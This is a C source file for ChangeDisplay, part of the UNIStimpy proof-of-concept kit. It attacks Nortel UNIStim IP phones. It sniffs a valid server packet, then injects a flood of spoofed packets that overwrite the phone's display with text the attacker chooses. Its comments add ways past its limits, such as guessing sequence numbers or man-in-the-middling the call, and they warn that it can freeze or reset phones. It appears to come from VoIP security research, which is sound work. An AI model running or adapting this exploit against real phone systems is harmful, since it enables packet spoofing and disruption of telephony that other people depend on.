/* UNIStimpy ChangeDisplay.c
 *  Copyright (C) 2007 eSentire, Inc.
 *  All other trademarks and copyrights are the property of their respective holders.
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License along
 *  with this program; if not, write to the Free Software Foundation, Inc.,
 *  51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
 */
/*
 *
 * Causes the phone's display to be changed to something of your choosing.
 * Note that this is only a proof-of-concept program (so error handling etc. not
 * handled. Suck it up.)
 *
 * Synopsis:
 *     ./changeDisplay \
 *         --phone1_ip=1.2.3.4 \
 *         --interface=eth0 \
 *         "0wned                   "
 *
 * WARNING:     We have found that this program can freeze/reset an IP phone.
 *              We don't recommend its use on anything but a test system, in a
 *              closed laboratory environment.
 *
 * Details:
 *     This is just a short/simple program that will change the display on a
 *     phone that's using Nortel's UNIStim protocol to whatever you want.
 *     This program works by first sniffing for a valid unistim packet from
 *     the server to the phone and then once it sees that, it will send a
 *     flood of packets all instructing the phone to display the text given on
 *     the command line.
 *
 * Limitations:
 *     Plenty, but for starters:
 *     - You must be inline so that you can sniff a valid packet first.
 *       (Alternatively, you could attempt to guess the unistim sequence
 *       number, which for the phones we examined, turns out to not be all
 *       that difficult.)
 *     - After sending the packets to the phone, the server and client will be
 *       out of sync with each other (with respect to the correct sequence
 *       number.)  This can cause confusion on the part of client which causes
 *       the client to reboot itself.  You could get around this by mitm'ing
 *       the conversation and dynamically modifying the sequence numbers as
 *       the packets pass through.
 *     - You must use a string that's exactly 24 characters long.  Note
 *       that there's no check in the program itself to ensure you stay within
 *       this limitation.  (The limitation itself is not within the program,
 *       but within the physical display size of the phones that I've tested
 *       against.  It's possible that you might have a different display
 *       length to work with.)  If you go over 24 characters, I'm not sure how
 *       the phone will react (fertile research topic).  If you use less, 
 *       the phone won't completely overwrite what's currently on the display.
 *       We recommend you pad your string with spaces to get exactly 24
 *       characters.
 *
 * WARNING 2:   We have found that this program can freeze/reset an IP phone.
 *              We don't recommend its use on anything but a test system, in a
 *              closed laboratory environment.  We mean it.  
 *     
 * HAJIME!
 */

#include <stdio.h>
#include <stdlib.h>
#include <getopt.h>
#include <netinet/in.h>
#include <netinet/ether.h>
#include <libnet.h>
#include <pcap.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "vlanhdr.h"
#include "nortelvoip.h"


char errbuf[LIBNET_ERRBUF_SIZE];

void usage(char* binname)
{
	printf("Usage:\n");
	printf("    %s [OPTIONS] \"display test\"\n\n", binname);
	printf("  -i, --interface=eth0\n");
	printf("  -0, --pbx_ip=1.2.3.4 (or leave blank to have this autodetected)\n");
	printf("  -1, --phone1_ip=1.2.3.4\n");
	printf("  -l, --vlan_id=123    (or leave blank for no vlan/autodetect)\n");
	printf("  -v, --verbose\n");
	printf("  -V, --version\n");
	printf("  -h, --help\n");
	printf("\n");
	printf("Note: currently the -0 flag is not implemented.  (It will always be autodetected.)\n");
	printf("Note: currently the -l flag is not implemented.  (It will always be autodetected.)\n");
	printf("\n");
	printf("Copyright (C) 2007 eSentire, Inc. and released under GPLv2.\n");
	printf("Use only in a closed test environment where you have obtained permission.\n");
	exit(0);
}

void version(char* binname)
{
	printf("%s version %s\n\n", binname, VERSION);
	exit(0);
}

typedef struct _args
{
	char* interface;
	struct in_addr pbx_ip;
	struct in_addr phone1_ip;
	uint16_t phone1_port;
	uint16_t vlan_id;
	bool verbose;
	char* displayText;
} Args;

Args parseArgs(int argc, char* argv[])
{
	Args retval;
	retval.interface = NULL;
	retval.pbx_ip.s_addr = 0;
	retval.phone1_ip.s_addr = 0;
	retval.phone1_port = 0;
	retval.vlan_id = 0;
	retval.verbose = false;
	retval.displayText = NULL;

	while (1)
	{
		int option_index = 0;
		static struct option long_options[] =
		{
			{"interface", 1, 0, 'i'},
			{"help", 0, 0, 'h'},
			{"pbx_ip", 1, 0, '0'},
			{"phone1_ip", 1, 0, '1'},
			//{"phone2_ip", 1, 0, '2'},
			{"vlan_id", 1, 0, 'l'},
			{"version", 0, 0, 'V'},
			{"verbose", 0, 0, 'v'},
			{0,0,0,0}
		};

		int c = getopt_long(argc, argv, "i:h0:1:l:Vv", long_options, &option_index);

		if (c == -1) break;

		int size = 0;
		switch (c)
		{
			case 'i':
				size = strlen(optarg);
				retval.interface = (char*)malloc(sizeof(char) * (size+1));
				strncpy(retval.interface, optarg, size);
				retval.interface[size] = 0;
				break;

			case '0':
				if (!inet_aton(optarg, &retval.pbx_ip))
				{
					printf("Couldn't convert '%s' to an ip address\n", optarg);
					exit(1);
				}
				printf("0 Detected %s\n", inet_ntoa(retval.pbx_ip));
				break;

			case '1':
				if (!inet_aton(optarg, &retval.phone1_ip))
				{
					printf("Couldn't convert '%s' to an ip address\n", optarg);
					exit(1);
				}
				printf("1 Detected %s\n", inet_ntoa(retval.phone1_ip));
				break;

			case 'l':
				retval.vlan_id = atoi(optarg);
				break;

			case 'V':
				version(argv[0]);
				break;

			case 'v':
				retval.verbose = true;
				break;

			case '?':
				printf("Unknown option?\n");
			case 'h':
				usage(argv[0]);
				break;

			default:
				printf("Invalid state!  getopt returned: %i\n", c);
				usage(argv[0]);
				break;
		}
	}

	if (optind < argc)
	{
		retval.displayText = argv[optind];
	}
	else
	{
		printf("No display text?\n");
		exit(1);
	}

				printf("0 Detected %s\n", inet_ntoa(retval.pbx_ip));
				printf("1 Detected %s\n", inet_ntoa(retval.phone1_ip));

	return retval;
}



int main(int argc, char* argv[])
{
	libnet_t* l = NULL;

	Args args = parseArgs(argc, argv);


	l = libnet_init(LIBNET_LINK, args.interface, errbuf);
	if (l == NULL)
	{
		printf("Error occured while opening libnet interface: '%s'\n", errbuf);
		exit(1);
	}

	if (args.pbx_ip.s_addr == 0)
	{
		struct params usefulParams;
		usefulParams = sniffUsefulParams(args.interface, args.phone1_ip);
		int i;
		for (i=0; i<10; i++)
		{
			changeDisplay(l, usefulParams.server_packet_id+i, args.displayText, usefulParams.pbx_mac, usefulParams.pbx_ip, usefulParams.pbx_port, usefulParams.phone_mac, args.phone1_ip, usefulParams.phone_port, usefulParams.vlan_id);
		}
	}
	else if (args.pbx_ip.s_addr != 0 && args.vlan_id != 0)
	{
		printf("NYI!\n");
		abort();
	}
	else
	{
		printf("huh?\n");
		abort();
	}

	libnet_destroy(l);
	return 0;
}
